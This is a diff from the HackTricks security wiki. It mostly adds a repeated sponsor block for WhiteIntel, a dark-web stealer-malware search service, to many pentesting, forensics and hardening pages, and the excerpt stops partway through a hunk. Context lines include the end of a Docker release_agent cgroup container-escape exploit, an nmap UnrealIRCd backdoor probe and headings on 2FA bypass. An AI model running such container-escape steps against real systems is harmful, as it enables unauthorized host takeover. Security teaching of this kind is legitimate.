diff --git a/crypto-and-stego/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md index 59c28f7cf..7c0bdbc8f 100644 --- a/crypto-and-stego/hash-length-extension-attack.md +++ b/crypto-and-stego/hash-length-extension-attack.md @@ -14,6 +14,20 @@ Other ways to support HackTricks: +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + # Summary of the attack @@ -48,6 +62,17 @@ If an attacker wants to append the string "append" he can: You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %}
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index ca2eda85f..407470d95 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content. @@ -44,7 +58,7 @@ For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsides There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) -``` +```bash python3 dnscat_decoder.py sample.pcap bad_domain ``` diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 1b34fb3ca..a8586ab93 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -16,6 +16,20 @@ Other ways to support HackTricks: +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Improve your Wireshark skills ### Tutorials @@ -168,6 +182,18 @@ f.write(all_bytes) f.close() ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/generic-methodologies-and-resources/threat-modeling.md b/generic-methodologies-and-resources/threat-modeling.md index 7469c907b..3feb92e22 100644 --- a/generic-methodologies-and-resources/threat-modeling.md +++ b/generic-methodologies-and-resources/threat-modeling.md @@ -1,5 +1,19 @@ # Threat Modeling +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Threat Modeling Welcome to HackTricks' comprehensive guide on Threat Modeling! Embark on an exploration of this critical aspect of cybersecurity, where we identify, understand, and strategize against potential vulnerabilities in a system. This thread serves as a step-by-step guide packed with real-world examples, helpful software, and easy-to-understand explanations. Ideal for both novices and experienced practitioners looking to fortify their cybersecurity defenses. @@ -109,3 +123,16 @@ Now your finished model should look something like this. And this is how you mak ### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool) This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. + + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} \ No newline at end of file diff --git a/hardware-physical-access/escaping-from-gui-applications.md b/hardware-physical-access/escaping-from-gui-applications.md index 848231c1c..81c40ca3a 100644 --- a/hardware-physical-access/escaping-from-gui-applications.md +++ b/hardware-physical-access/escaping-from-gui-applications.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + # Check for possible actions inside the GUI application @@ -289,6 +303,18 @@ These shortcuts are for the visual settings and sound settings, depending on the * [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md index 79f9ae37b..da93911a7 100644 --- a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md +++ b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Basic Information @@ -65,6 +79,19 @@ In a setup with multiple auth modules, the process follows a strict order. If th * [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index e67d3add8..bbba20d3a 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Basic Information AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions. @@ -306,6 +320,18 @@ chmod +x /tmp/test.pl /tmp/test.pl ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 3f62c9116..97d1b7148 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + **For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary: @@ -71,6 +85,17 @@ chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %}
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md index ba70c4c90..2c7d645f8 100644 --- a/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/macos-hardening/macos-red-teaming/macos-keychain.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Main Keychains * The **User Keychain** (`~/Library/Keychains/login.keycahin-db`), which is used to store **user-specific credentials** like application passwords, internet passwords, user-generated certificates, network passwords, and user-generated public/private keys. @@ -134,6 +148,18 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os * [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md index 04d794f7a..f4903a54b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Memory Artifacts ### Swap Files @@ -66,6 +80,18 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem- ``` {% endcode %} +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md index b996af4e6..8d1a32354 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ### Common Users * **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_": diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 028f2cc59..144a236aa 100644 --- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -14,6 +14,20 @@ Other ways to support HackTricks: +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + **For further information check: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** Android apps can use native libraries, typically written in C or C++, for performance-critical tasks. Malware creators also use these libraries, as they're harder to reverse engineer than DEX bytecode. The section emphasizes reverse engineering skills tailored to Android, rather than teaching assembly languages. ARM and x86 versions of libraries are provided for compatibility. @@ -57,6 +71,19 @@ Android apps can use native libraries, typically written in C or C++, for perfor - **Debugging Native Libraries:** - [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 37060e445..f8907441e 100644 --- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Installing Frida **Steps to install Frida on a Jailbroken device:** @@ -377,6 +391,20 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 7daf02ba5..a7c68fce5 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Basic Information **Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access. diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index 700608ea9..28548bf38 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -14,6 +14,20 @@ Other ways to support HackTricks: +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Basic Information **MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial. @@ -136,6 +150,18 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header * `port:1883 MQTT` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index c4e9086d8..9cd526768 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ### Docker Basics #### What is @@ -348,6 +362,20 @@ You can use auditd to monitor docker. * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md index 908b46b4b..3f8823e60 100644 --- a/network-services-pentesting/pentesting-irc.md +++ b/network-services-pentesting/pentesting-irc.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Basic Information IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation. @@ -93,6 +107,19 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66 * `looking up your hostname` + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index c7bbe127d..0d59f16b3 100644 --- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Signaling Protocols ### SIP (Session Initiation Protocol) @@ -106,6 +120,18 @@ SDP's simplicity and flexibility make it a widely adopted standard for describin These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks. +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index c2336932f..a0f77af82 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Introduction Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers. @@ -335,6 +349,18 @@ npm start * More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) * [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index d86554ead..bd5ed96f2 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + Test executable file extensions: * asp @@ -284,6 +298,18 @@ HTTP/1.1 401 Unauthorized HTTP/1.1 200 OK ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md index f161a8c8d..50f04e503 100644 --- a/pentesting-web/2fa-bypass.md +++ b/pentesting-web/2fa-bypass.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## **Enhanced Two-Factor Authentication Bypass Techniques** ### **Direct Endpoint Access** @@ -131,6 +145,19 @@ Utilizing decoy requests to obfuscate brute force attempts or mislead rate limit * [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md) * [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +P
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md index dea819774..2a66d9679 100644 --- a/pentesting-web/client-side-template-injection-csti.md +++ b/pentesting-web/client-side-template-injection-csti.md @@ -14,6 +14,19 @@ Other ways to support HackTricks:
+## WhiteIntel + +
